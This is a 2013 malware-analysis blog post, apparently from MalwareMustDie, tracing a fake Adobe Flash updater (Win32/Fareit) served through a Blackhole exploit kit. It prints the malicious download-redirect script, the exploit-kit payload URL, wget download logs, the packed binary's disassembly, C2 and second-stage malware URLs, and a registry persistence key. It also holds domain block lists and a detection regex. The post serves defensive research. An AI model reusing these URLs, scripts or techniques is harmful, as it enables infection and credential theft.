Thursday, March 7, 2013

Fake Adobe Flash Updater in 173.246.102.2 - Win32/Fareit downloads Win32/Medfos (to then download OTHER malware at Megaupload.com)

This story is all started from an EK landing page at:
"h00p://17.247nycr.com/news/breaks-harmless.php"
in the IP: 173.246.102.2 At the below network registration:
NetRange:       173.246.96.0 - 173.246.111.255
CIDR:           173.246.96.0/20
OriginAS:       AS29169
NetName:        GANDI-NET-DC1-1
NetHandle:      NET-173-246-96-0-1
Parent:         NET-173-0-0-0-0
NetType:        Direct Allocation
Comment:        http://www.gandi.net/
RegDate:        2010-06-18
Updated:        2012-02-24
Ref:            http://whois.arin.net/rest/net/NET-173-246-96-0-1
OrgName:        Gandi US Inc.
OrgId:          GANDI-2
Address:        Gandi US Inc.
Address:        PO Box 32863
City:           Baltimore
StateProv:      MD
PostalCode:     21282
Country:        US
RegDate:        2010-05-20
Updated:        2010-06-24
Comment:        Gandi is an ICANN accredited registrar and VPS/Cloud hosting provider with operations in France, UK, and the United States.
Comment:        http://www.gandi.net/
Ref:            http://whois.arin.net/rest/org/GANDI-2
It has an NEW UPDATED infections in these URL here-->>[UrlQuery] At the below IP:
174.140.167.197
173.246.102.250
173.255.215.242 "(killed)"
173.246.102.2
50.116.11.176
184.154.70.115
↑The GeoIP result is↓ Which I checked it further to find a Blackhole Exploit Kit:
Server: nginx/0.7.67
Date: Thu, 07 Mar 2013 11:19:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14-1~dotdeb.0
As a reference infector(URL)-->>[urlquery.net] And a long list of historical reports of same IP-->>[urlquery.net]
For the blackhole exploit kit configuration itself, it is a better tuned one, more than one tries thus requesting with bad parameters will get us an 502 or 404, shortly, if you put everything right as per our guide -->>[here], you'll get yourself a usual BHEK payload download url as below:
"h00p://17.247nycr.com/news/breaks-harmless.php?df=1m:1o:1g:1g:31&xe=1n:1m:1o:1g:1o:33:33:1k:31:1o&y=1f&fl=c&eh=q&jopa=6435338"
..And the downloaded payload is as per show in URLQuery snapshot here-->http://urlquery.net/report.php?id=1268751
↑The details of decoding payload of BHEK was covered many times in our previous posts so forgive me for not going to discuss it here.. But I'll go to the next "important" part..

I received a separate report by "a friend" about an active end of TDS and another separated report of Spam destination pointed to the same infector server BUT with the different domain name as per below URL:

"h00p://17.optimax-fuel-saver.us/adobe/"
Yes, both routes are having same destination IP: 173.246.102.2 and in overall this infection is the double routes scheme of TDS/Spam combined with blackhole to infect a payload < This is the main point of this post.

The Fake Adobe download page looks like below (looks lame isn't it?):
A view via Internet Explorer: A view via Mozilla Firefox: (sorry for the japanese browsers I used..)

which is having a redirect script is as per below:

// Evil script in Line 139:
  :
<script language = 'javascript'>
  var delay = 3000;
  setTimeout("document.location.href='update_flash_player.exe'", delay);
</script>
If we follow this.. you'll get the payload url: a fake flash player updater:
--2013-03-07 15:58:47--  
"h00p://17.optimax-fuel-saver.us/adobe/update_flash_player.exe"
Resolving 17.optimax-fuel-saver.us... seconds 0.00, "173.246.102.2"
Caching 17.optimax-fuel-saver.us => "173.246.102.2"
Connecting to 17."optimax-fuel-saver.us"|"173.246.102.2|:80"... seconds 0.00, connected.
"GET /adobe/update_flash_player.exe HTTP/1.0
Referer: h00p://17.247nycr.com/news/breaks-harmless.php
Host: 17.optimax-fuel-saver.us"
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 07 Mar 2013 06:57:52 GMT
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 136704
Last-Modified: Thu, 07 Mar 2013 06:55:01 GMT
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 136704 (134K) [application/octet-stream]
Saving to: `update_flash_player.exe'
2013-03-07 15:58:52 (44.6 KB/s) - `update_flash_player.exe' saved [136704/136704]

You'll see safely the snapshot of this payload here-->>[URLQuery]

"What is with this payload? Why the double-routes infection scheme is so necessary?" These questions will be answered by studying the payloads as follows:

Payload: Fake Adobe Flash Updater

The bad guys are utilizing Adobe Flash Updates season to release this fake updater together with the lame Adobe home page. The payload binary looks like below:

// File Information:
Sections:
   .text 0x1000 0x13b0 5120
   .rdata 0x3000 0xc0c 3584
   .data 0x4000 0xa0a 3072
   .rsrc 0x5000 0x1e2ac 123904

File Size : 136 KB
Entry Point: 0x1174
Compile Time: "2013-01-24 03:07:22
              0x510026DA [Wed Jan 23 18:07:22 2013 UTC]"
CRC Fail. Claimed:  0, Actual:  201663

//Anti-reverse:
0x401174 mov eax esi 
0x401176 add esi 0x403110 
0x401178 sub esi 0x6d 
0x40117e mov esi [si-0x1] 
0x401181 push 0x55 
0x401184 shl esi 0xc 
0x401186 pop ecx 
0x401189 shl esi 0x4 
0x40118a add eax esi 
0x40118d add eax 0x8f 
0x40118f mov edx [eax+ecx2+0x2] 
0x401192 shr edx 0x8 
0x401196 add esi edx 
0x401199 mov ecx [si+0x1d] 
0x40119b sub cl 0x0 
0x40119e jz 0x4011c6L 
0x4011a1 mov dl 0x1c 
0x4011a3 cmp cl dl 
0x4011a5 jb 0x4011bdL 
0x4011a7 mov dl 0xc0 
0x4011a9 cmp cl dl 
0x4011ab nop "
0x4011ad ja 0x4011bdL 
0x4011ae mov r15d 0x404000 
0x4011b0 xor eax eax 
0x4011b5 jz 0x4010d0L 
0x4011b7 xor eax eax 
0x4011bd mov [fs:ax] esp "
0x4011bf nop 
0x4011c2 pushad 
0x4011c3 jmp near 0x4011bdL 
0x4011c4 xor eax eax 
0x4011bd mov [fs:ax] esp 
0x4011bf nop 
   :      : //loops..
↑the binary itself is encoded with a packer - with utilize using anti-reverse loops to avoid us getting the - imports data. Suggesting this wasn't a work of automation. Packer information:
"aPLib v1.01"  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: "http://www.ibsensoftware.com/"
hex of the 1st block:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 FF 00 00 00 7C 00 00 00    ............|...
0040   BC 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90    ........!..L.!..
0050   54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73    This program mus
0060   74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57    t be run under W
0070   69 6E 33 32 0D 0A 24 37 00 00 00 00 50 45 00 00    in32..$7....PE..
0080   4C 01 04 00 DA 26 00 51 00 00 00 00 00 00 00 00    L....&.Q........
0090   E0 00 0F 01 0B 01 0C 00 00 14 00 00 00 FE 01 00    ................
00A0   00 00 00 00 74 11 00 00 00 10 00 00 00 30 00 00    ....t........0..
00B0   00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00    ..@.............
00C0   00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00    .............@..
00D0   00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00    .................
 :                            :                                :
The picture of binary is like this: ↑Well, it looks convincing... ..except..if you run it you'll see the "different" works as per below: The below are the overall summary of this infection: 1. The malware runs connect to these remote hosts:
"h00p://64.13.172.42:8080/forum/viewtopic.php
h00p://20.anythinginternational.biz/forum/viewtopic.php
h00p://20.anythinginternational.com/forum/viewtopic.php
h00p://20.chelsiamd.com/forum/viewtopic.php
"
2. Which sending the HTTP/1.1 POST i.e.: 3. And then send request to download OTHER malware to:
"h00p://kfz-youngtimerservice.de/P81.exe
h00p://mtmedia.net/tJr4H.exe
h00p://cinemacityhu.iq.pl/iN5Vf.exe
"
PoC: 4. The downloaded file was saved in %Temp%: 5. With little help of evil BAT file the payload was saved in %AppData% as random DLL: 6. The %AppData% saved DLL was executed via RUNDLL32.EXE, after running and it made changes in the registry:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uping: 
  "rundll32.exe "C:\Documents and Settings\rik\Application Data\uping.dll",AAuxClose"
7. And executed iexplorer.exe with the "-Embedding" option 8. Then via iexplore.exe it started next series of malware download from megaupload.com: 9. And also some malform UDP/137 request sent: What is the purpose of the POST request? Yes friends, is to steal credentials. The below information are aimed to be stolen by ths malware:
My Documents
AppData
Local AppData
Cache
Cookies
History
My Documents
Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
   :
PLUS MORE credentials of this software list -->>[PASTEBIN]

How bad are these malicious stuffs?

The above data concluded that the Fake Flash Updater is a Trojan PWS Win32/Fareit variant (this verdict is judged by seeing the list of data grabber, the usage of particular packer and binary cryptic, and the header HTTP/1.0 used) see the definition in here too-->>[Microsoft], and the first downloaded binary malware, a "fake" DLL is the variant of Trojan Downloader Win32/Medfos is a malware downloader to download other malware implented in the various free-download sites (in our case is megaupload.com), with the reference here -->>[Microsoft]

What's the purpose of this IP's infection then?

The purpose is to grab as much's victim's credentials by using front end infection of Fake Software Updater. Just like the pages with url we saw, there are so many other Fake Updaters is served under other IPs too, and they are all using typical bogus url of http://[2digitnumber].[fakebrowser-bogus-strings].com/[adobe|chrome|other updater possibilities]/ which is suggested the same cryber crime group action, for example as per found in IP: 173.255.215.242 by our friend @hugbomb here:

Fake Adobe Flash Player Updates for Chrome:

Fake Google Chrome Update

The currently active domains pointed to IP used by this Criminal Group: 173.255.215.242 and 173.246.102.2 are strongly suggested to be blocked, i.e. below list:

To IP: 173.246.102.2

17.247nycr.com
17.ir-c.net
17.optimax-fuel-saver.us
17.schnoescpa.com
17.setapartcreative.com
. :
To IP: 173.255.215.242
20.phccofcalifornia.com  
20.chelsiamd.com  
20.mallcoimbatore.com  
20.anythinginternational.com
20.phcccontractor.com  
20.phcccontractors.com  
20.anythingindian.co  
20.anythinginternational.biz
PS: Please use the complete list made by Mr. Conrad Longmore here-->>[Dynamoo Blog]
With noted that the domains is changed frequently, to nail this scheme perfectly you will need to understand how they use the domain ragistration as per below details:
// lookup optimax-fuel-saver.us
17.optimax-fuel-saver.us internet address = 173.246.102.2
optimax-fuel-saver.us   nameserver = "ns07.domaincontrol.com"
optimax-fuel-saver.us   nameserver = "ns08.domaincontrol.com"
optimax-fuel-saver.us
        primary name server = ns07.domaincontrol.com
        responsible mail addr = dns.jomax.net
        serial  = 2013030500
        refresh = 28800 (8 hours)
        retry   = 7200 (2 hours)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
//whois
Domain Name:                                 OPTIMAX-FUEL-SAVER.US
Domain ID:                                   D36373111-US
Sponsoring Registrar:                        "GODADDY.COM, INC."
Sponsoring Registrar IANA ID:                146
Registrant ID:                               CR115585728
Created by Registrar:                        GODADDY.COM, INC.
Last Updated by Registrar:                   GODADDY.COM, INC.
Domain Registration Date:                    Sun Jun 10 01:03:54 GMT 2012
Domain Expiration Date:                      Sun Jun 09 23:59:59 GMT 2013
Domain Last Updated Date:                    Sun Jun 10 01:03:55 GMT 2012

// lookup phccpro.com
20.phccpro.com  internet address = 173.255.215.242
phccpro.com     nameserver = "ns37.domaincontrol.com"
phccpro.com     nameserver = "ns38.domaincontrol.com"
        primary name server = "ns37.domaincontrol.com"
        responsible mail addr = dns.jomax.net
        serial  = 2013030600
        refresh = 28800 (8 hours)
        retry   = 7200 (2 hours)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)

//whois it?
  Domain Name: PHCCPRO.COM
   Registrar: "GODADDY.COM, LLC"
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: NS37.DOMAINCONTROL.COM
   Name Server: NS38.DOMAINCONTROL.COM
   Status: clientDeleteProhibited
   Status: clientRenewProhibited
   Status: clientTransferProhibited
   Status: clientUpdateProhibited
   Updated Date: 15-apr-2011
   Creation Date: 20-jun-2009
   Expiration Date: 20-jun-2013<

//lookup 17.setapartcreative.com
17.setapartcreative.com internet address = 173.246.102.2
setapartcreative.com    nameserver = ns07.domaincontrol.com
setapartcreative.com    nameserver = ns08.domaincontrol.com
setapartcreative.com
        primary name server = ns07.domaincontrol.com
        responsible mail addr = dns.jomax.net
        serial  = 2013030400
        refresh = 28800 (8 hours)
        retry   = 7200 (2 hours)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
//whois:
   Domain Name: SETAPARTCREATIVE.COM
   Registrar: "GODADDY.COM, LLC"
   Whois Server: whois.godaddy.com
   Referral URL: http://registrar.godaddy.com
   Name Server: "NS07.DOMAINCONTROL.COM"
   Name Server: "NS08.DOMAINCONTROL.COM"
   Status: clientDeleteProhibited
   Status: clientRenewProhibited
   Status: clientTransferProhibited
   Status: clientUpdateProhibited
   Updated Date: 04-feb-2013
   Creation Date: 03-feb-2009
   Expiration Date: 03-feb-2014

If you see what I see, the malware moronz' group is serving malware domains by the pattern of using GoDaddy registrar with DOMAINCONTROL.COM DNS of the legit domains which is somehow hacked, these domains are used by adding the numerical subdomains through its DNS to be used as infectors. Don't ask me how the crime group can gain of control of these domains, which could be procedural or technicality leaks.. This matter is to be strongly noted to GoDaddy (Registrar), DomainControl (DNS provider) and furthermore in higher authority is ICANN to be aware of this malicious scheme.

Samples

Virus Total Detection of Trojan/Fareit-->>[URL], summary:
SHA1: 1e9769c652e94af4b0accc42da643a1c00021b30
MD5: a1545b09716f6036739daafa003649a1
File size: 133.5 KB ( 136704 bytes )
File name: update_flash_player.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 17 / 46
Analysis date: 2013-03-07 12:07:28 UTC ( 2 hours, 8 minutes ago )

F-Secure                 : Trojan.FakeAlert.DFX
F-Prot                   : W32/SuspPack.EX2.gen!Eldorado
Symantec                 : Suspicious.Cloud
ESET-NOD32               : a variant of Win32/Kryptik.AWDG
MicroWorld-eScan         : Trojan.FakeAlert.DFX
Avast                    : Win32:LockScreen-SL [Trj]
nProtect                 : Trojan.FakeAlert.DFX
CAT-QuickHeal            : (Suspicious) - DNAScan
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Trojan.FakeAlert.DFX
McAfee                   : BackDoor-FJW
Malwarebytes             : Malware.Packer.SGX2
Fortinet                 : W32/Kryptik.KZ!tr
GData                    : Trojan.FakeAlert.DFX
PCTools                  : HeurEngine.ZeroDayThreat
Sophos                   : Troj/Zbot-ECS
Comodo                   : Heur.Packed.Unknown
Virus Total Detection of Trojan Medfos-->>[URL], summary:
SHA1: fbc141e3c155b809298f53336c583697a209e567
MD5: 68db8dfe21ffa72982402fef5ef48c14
File size: 145.0 KB ( 148480 bytes )
File name: int.EXE
File type: Win32 EXE
Tags: peexe
Detection ratio: 13 / 46
Analysis date: 2013-03-07 10:41:05 UTC ( 3 hours, 37 minutes ago )

F-Secure                 : Gen:Variant.Zusy.38855
GData                    : Gen:Variant.Zusy.38855
Norman                   : Medfos.BO
ESET-NOD32               : a variant of Win32/Medfos.LL
MicroWorld-eScan         : Gen:Variant.Zusy.38855
Sophos                   : Mal/Medfos-M
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Gen:Variant.Zusy.38855
Malwarebytes             : Trojan.Medfos
Panda                    : Suspicious file
Fortinet                 : W32/Medfos.KG!tr
PCTools                  : HeurEngine.ZeroDayThreat
Microsoft                : Trojan:Win32/Medfos.A  
And the samples download for research purpose.. ..is here--->>[MEDIAFIRE] And these are PCAP data I recorded-->>[HERE] *) Please feel free to contact us by twitter for more research materials :-)
#MalwareMustDie! The NPO of Engineers who care of security | http://www.malwaremustdie.org

7 comments:

  1. Nice, identified some of the bad domains here.

    ReplyDelete
  2. [Additional #1]

    Thank's to Conrad of Dynamoo Blog, he was making a very good block list of the related bad URLs of the host/infector reported in this post (173.246.102.2) in [HERE]

    ReplyDelete
  3. [Additional #2]

    These mal-domains are UP and ALIVE pointed to 173.246.102.2

    17.247nycr.com
    17.ir-c.net
    17.optimax-fuel-saver.us
    17.schnoescpa.com
    17.setapartcreative.com

    ReplyDelete
  4. New Series of Adobe Updater Malware Infection detected in below domains;

    //Infector NEW alive domains...

    21.aribadellago.com
    21.cedrictherealtor.com
    21.az55pluscommunity.com
    21.aribadellago.com

    // IP infectors....SHURTDOWN THIS!
    173.246.102.250 [United States]

    // Network:
    NetRange: 173.246.96.0 - 173.246.111.255
    CIDR: 173.246.96.0/20
    OriginAS: AS29169
    NetName: GANDI-NET-DC1-1
    OrgName: Gandi US Inc.
    OrgId: GANDI-2
    Address: PO Box 32863
    City: Baltimore
    StateProv: MD
    PostalCode: 21282
    Country: US
    RegDate: 2010-05-20
    Updated: 2010-06-24
    Comment: Gandi is an ICANN accredited registrar and VPS/Cloud hosting
    provider with operations in France, UK & United States.
    Comment: http://www.gandi.net/
    Ref: http://whois.arin.net/rest/org/GANDI-2

    // To be blocked:

    h00p://21.az55pluscommunity.com/*
    h00p://21.cedrictherealtor.com/*
    h00p://21.az55pluscommunity.com/*
    h00p://21.aribadellago.com/*

    //Recorded Infector URL

    h00p://21.az55pluscommunity.com/news/tuts_php_hit_counter.php

    h00p://21.cedrictherealtor.com/news/algorithms_creates-sides.php
    h00p://21.cedrictherealtor.com/adobe/update_flash_player.exe
    h00p://21.cedrictherealtor.com/news/tuts_php_hit_counter.php
    h00p://21.cedrictherealtor.com/news/faults-ending.php
    h00p://21.cedrictherealtor.com/news/striking-tendency_members.ph

    h00p://21.az55pluscommunity.com/adobe/
    h00p://21.az55pluscommunity.com/adobe/update_flash_player.exe

    h00p://21.aribadellago.com
    h00p://21.aribadellago.com/adobe/
    h00p://21.aribadellago.com/news/striking-tendency_members.php
    h00p://21.aribadellago.com/news/falls_unit-dump_invariably.php
    h00p://21.aribadellago.com/news/meetings-plans-doubtful.php
    h00p://21.aribadellago.com/adobe/update_flash_player.exe
    ----
    #MalwareMustDie!

    ReplyDelete
  5. // Dangerous & Highly Suspected Domains
    // All are UP & ALIVE
    // Logic Pre-CALC: http://21.*.com/*
    // Worth to check your network relation and to #BLOCK!
    // CVS format: Domains,IP,Verdict

    21.blancoface.com,208.87.35.103, (Suspected: CYCBOT)
    21.data-center-india.com,82.98.86.167, (Suspected: Elenore exploit kit )
    21.devotski.com,69.43.161.166, (Suspected: KoobFace)
    21.idealfly.com,107.20.206.69, (Suspected: TDS SUTRA)
    21.kwihosting.com,69.43.161.159, (Suspected: TDS SUTRA)
    21.movfree.com,204.13.162.116, (Suspected: MALWARE-CNC Sality logos.gif URLs )
    21.roundclip.com,107.20.206.69, (Suspected: ET TROJAN DLoader)
    21.shopband.com,216.8.179.25, (Suspected: Casalemedia Spyware)
    21.shopflip.com,107.20.206.69, (Suspected: TROJAN DLoader)

    ---
    #MalwareMustDie!

    ReplyDelete
  6. 173.255.215.242 #tango was burned down

    ReplyDelete
  7. using rgx: \/[0-9]{2}\.[a-z]{3,}\.[a-z]{2,4}\/[a-z]{3,}\/[a-z]{3,} i.e. here

    ReplyDelete